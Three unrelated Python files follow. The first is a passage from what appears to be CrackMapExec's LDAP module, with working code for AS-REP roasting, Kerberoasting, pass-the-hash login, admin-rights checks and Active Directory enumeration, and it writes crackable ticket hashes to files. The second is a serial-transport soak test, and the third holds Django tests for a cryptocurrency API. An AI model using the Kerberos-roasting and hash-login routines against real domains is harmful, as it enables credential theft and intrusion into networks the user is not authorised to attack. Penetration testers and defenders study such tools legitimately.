egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
return parser
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': "SMB",
'host': self.host,
'port': "445",
'hostname': self.hostname
})
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login('' , '')
except:
#if "STATUS_ACCESS_DENIED" in e:
pass
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
if not self.domain:
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
return True
def kerberos_login(self, domain, aesKey, kdcHost):
if self.kdcHost is not None:
target = self.kdcHost
else:
target = self.domain
self.kdcHost = self.domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return True
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Connect to LDAP
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
password,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
# Connect to LDAP
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
nthash,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.nthash,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
def create_smbv1_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
return False
return True
def create_smbv3_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
except socket.error:
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
return False
return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
def sid_to_str(self, sid):
try:
# revision
revision = int(sid[0])
# count of sub authorities
sub_authorities = int(sid[1])
# big endian
identifier_authority = int.from_bytes(sid[2:8], byteorder='big')
# If true then it is represented in hex
if identifier_authority >= 2 ** 32:
identifier_authority = hex(identifier_authority)
# loop over the count of small endians
sub_authority = '-' + '-'.join([str(int.from_bytes(sid[8 + (i * 4): 12 + (i * 4)], byteorder='little')) for i in range(sub_authorities)])
objectSid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return objectSid
except Exception:
pass
return sid
def check_if_admin(self):
# 1. get SID of the domaine
sid_domaine = ""
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes= ["objectSid"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for attribute in resp[0][1]:
if str(attribute['type']) == 'objectSid':
sid = self.sid_to_str(attribute['vals'][0])
sid_domaine = '-'.join(sid.split('-')[:-1])
# 2. get all group cn name
searchFilter = "(|(objectSid="+sid_domaine+"-512)(objectSid="+sid_domaine+"-544)(objectSid="+sid_domaine+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes= ["distinguishedName"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
for attribute in item['attributes']:
if str(attribute['type']) == 'distinguishedName':
answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute['vals'][0] + ")"))
# 3. get memeber of these groups
searchFilter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
attributes= [""]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
if item:
self.admin_privs = True
def getUnixTime(self, t):
t -= 116444736000000000
t /= 10000000
return t
def search(self, searchFilter, attributes, sizeLimit=0):
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
self.logger.error('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
self.logger.error(e)
return False
return resp
def users(self):
# Building the search filter
searchFilter = "(sAMAccountType=805306368)"
attributes= ['sAMAccountName', 'description', 'badPasswordTime', 'badPwdCount', 'pwdLastSet']
resp = self.search(searchFilter, attributes, sizeLimit=0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ''
badPasswordTime = ''
badPwdCount = 0
description = ''
pwdLastSet = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
elif str(attribute['type']) == 'description':
description = str(attribute['vals'][0])
self.logger.highlight('{:<30} {}'.format(sAMAccountName, description))
except Exception as e:
self.logger.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=['name']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
self.logger.highlight('{}'.format(name))
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
def asreproast(self):
if self.password == '' and self.nthash == '' and self.kerberos == False:
return False
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
for user in answers:
hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return True
else:
self.logger.highlight("No entries found!")
return
self.logger.error("Error with the LDAP account used")
def kerberoasting(self):
# Building the search filter
searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
#users = dict( (vals[1], vals[0]) for vals in answers)
TGT = KerberosAttacks(self).getTGT_kerberoasting()
for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
self.kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
self.logger.highlight(u'{}'.format(r))
with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
hash_kerberoasting.write(r + '\n')
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('SPN: %s - %s' % (SPN,str(e)))
else:
self.logger.highlight("No entries found!")
return
self.logger.error("Error with the LDAP account used")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=0)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
status = 'enabled'
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
if int(attribute['vals'][0]) & 2 :
status = 'disabled'
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight("User: " + value[0] + " Status: " + value[5])
else:
self.logger.error("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
|
"""
Soak test for transport layer
"""
from logging import DEBUG, FileHandler
from random import randrange
from struct import unpack
from time import time
from min import MINTransportSerial, min_logger
MIN_PORT = '/dev/tty.usbmodem1421'
def bytes_to_int32(data: bytes, big_endian=True) -> int:
if len(data) != 4:
raise ValueError("int32 shoud be exactly 4 bytes")
if big_endian:
return unpack('>I', data)[0]
else:
return unpack('<I', data)[0]
def wait_for_frames(min_handler: MINTransportSerial, timeout=3.0):
start = time()
while True:
frames = min_handler.poll()
if frames:
return frames
if time() - start > timeout:
raise TimeoutError
def soak_test():
min_handler = MINTransportSerial(port=MIN_PORT, loglevel=DEBUG)
min_handler.fake_errors = True
min_log_handler = FileHandler('min.log')
min_logger.addHandler(min_log_handler)
# Tell the target that we are resetting to start a session
min_handler.transport_reset()
while True:
# Send up to 10 frames in a batch
batch_len = randrange(10) + 1
min_ids = []
payloads = []
print("Sending a batch of length {}".format(batch_len))
total_payload_size = 512
for run in range(batch_len):
min_id = randrange(0x40)
payload_size = min(total_payload_size, randrange(256))
total_payload_size -= payload_size
payload = bytes([randrange(256) for i in range(payload_size)])
min_ids.append(min_id)
payloads.append(payload)
# Send a frame on the serial line
print(">>>>>>>>>>>>>>>> Sending ID={} payload len={}".format(min_id, payload_size))
min_handler.queue_frame(min_id=min_id, payload=payload)
while True:
# Wait for the frames to come back
for frame in wait_for_frames(min_handler):
print(">>>>>>>>>>>>>>>> Got frame min_id={}, payload len={}".format(frame.min_id, len(frame.payload)))
if frame.min_id != min_ids[0]:
raise AssertionError("Failed: did not get back the MIN ID we sent")
if frame.payload != payloads[0]:
raise AssertionError("Failed: did not get back the payload we sent")
del min_ids[0]
del payloads[0]
print("Remaining: {}".format(len(min_ids)))
if len(min_ids) == 0:
print("Batch received back OK")
break
if __name__ == "__main__":
soak_test() |
# Copyright 2019-2020 Alexander Polishchuk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from decimal import Decimal
import pytest
from django import urls
from django_obm import models
class TestCurrencyViewSet:
@staticmethod
@pytest.mark.django_db
@pytest.mark.usefixtures("bitcoin_currency", "ethereum_currency")
def test_get(client):
response = client.get(urls.reverse("currency-list"))
assert response.status_code == 200
result = response.json()
assert len(result) == 2
@staticmethod
@pytest.mark.django_db
def test_get_estimate_fee(monkeypatch, client, node):
monkeypatch.setattr(
models.Node,
"estimate_fee",
lambda *_, **__: 0.0001,
)
response = client.post(
urls.reverse("currency-estimate-fee"),
data={
"currency": node.connector.currency,
"to_address": "fake",
"amount": "11"
}
)
assert response.status_code == 200
result = response.json()
assert result["estimated_fee"] == 0.0001
@pytest.mark.integration
class TestCurrencyViewSetIntegration:
@staticmethod
@pytest.mark.django_db
def test_get_estimate_fee(client, node):
ethereum_tx = {
"currency": node.connector.currency,
"to_address": str(os.environ.get("GETH_IN_WALLET_ADDRESS")),
"amount": "10",
}
response = client.post(
urls.reverse("currency-estimate-fee"),
data=ethereum_tx,
)
assert response.status_code == 200
result = response.json()
assert isinstance(result["estimated_fee"], float)
class TestAddressViewSet:
@staticmethod
@pytest.mark.django_db
def test_get(client):
response = client.get(urls.reverse("address-list"))
assert response.status_code == 200
result = response.json()
assert result == []
@staticmethod
@pytest.mark.django_db
def test_post(monkeypatch, client, node):
monkeypatch.setattr(
models.Node, "create_address", lambda *_, **__: "fake-addr",
)
response = client.post(
urls.reverse("address-list"),
data={"currency": node.connector.currency},
)
assert response.status_code == 201
assert models.Address.objects.count() == 1
result = response.json()
assert result["value"] == "fake-addr"
if node.name == 'geth':
assert result["password"] == ""
@pytest.mark.integration
class TestAddressViewSetIntegration:
@staticmethod
@pytest.mark.django_db
def test_post(client, node):
response = client.post(
urls.reverse("address-list"),
data={"currency": node.connector.currency},
)
assert response.status_code == 201
assert models.Address.objects.count() == 1
result = response.json()
assert isinstance(result["value"], str)
assert len(result["value"]) > 20
if node.name == 'geth':
assert result["password"] == ""
class TestTransactionViewSet:
@staticmethod
@pytest.mark.django_db
@pytest.mark.usefixtures("bitcoin_transaction")
def test_get(client):
response = client.get(urls.reverse("transaction-list"))
assert response.status_code == 200
result = response.json()
assert len(result) == 1
@staticmethod
@pytest.mark.django_db
def test_get_empty(client):
response = client.get(urls.reverse("transaction-list"))
assert response.status_code == 200
result = response.json()
assert result == []
@staticmethod
@pytest.mark.django_db
def test_post(monkeypatch, client, node):
monkeypatch.setattr(
models.Node,
"send_transaction",
lambda *_, **__: {
"fee": 0.000001,
"txid": "fake-txid",
"timestamp": 1562415913,
"amount": 0.00001,
},
)
# TODO: Add fee handling
response = client.post(
urls.reverse("transaction-list"),
data={
"currency": node.connector.currency,
"to_address": "fake-addr",
"amount": 10,
},
)
assert response.status_code == 201
assert models.Transaction.objects.count() == 1
result = response.json()
assert result["txid"] == "fake-txid"
assert Decimal(result["fee"]) == Decimal("0.000001")
@pytest.mark.integration
class TestTransactionViewSetIntegration:
@staticmethod
@pytest.mark.django_db
def test_post_with_subtract_fee_from_amount(client, node):
data_mapping = {
"bitcoin": {
"currency": "bitcoin",
"to_address": os.environ.get("BITCOIN_CORE_IN_WALLET_ADDRESS"),
"amount": Decimal('0.00001'),
},
"ethereum": {
"currency": "ethereum",
"from_address": os.environ.get("GETH_SEND_FROM_ADDRESS"),
"to_address": os.environ.get("GETH_IN_WALLET_ADDRESS"),
"amount": Decimal('0.00003'),
# TODO: Create new addr with default password
"password": "abc",
},
}
response = client.post(
urls.reverse("transaction-list"),
data=data_mapping[node.connector.currency],
)
amount = data_mapping[node.connector.currency]["amount"]
assert response.status_code == 201
assert models.Transaction.objects.count() == 1
result = response.json()
assert Decimal(result["amount"]) + Decimal(result["fee"]) == amount
assert isinstance(result["txid"], str)
assert len(result["txid"]) > 20
@staticmethod
@pytest.mark.django_db
@pytest.mark.usefixtures("geth_node")
def test_post_without_password_to_ethereum_address(
client, ethereum_address
):
amount = 0.0000001
response = client.post(
urls.reverse("transaction-list"),
data={
"currency": "ethereum",
"from_address": ethereum_address.value,
"to_address": os.environ.get("GETH_IN_WALLET_ADDRESS"),
"amount": 0.0000001,
"subtract_fee_from_amount": False,
},
)
assert response.status_code == 201
assert models.Transaction.objects.count() == 1
result = response.json()
assert float(result["amount"]) == amount
assert float(result["fee"])
assert isinstance(result["txid"], str)
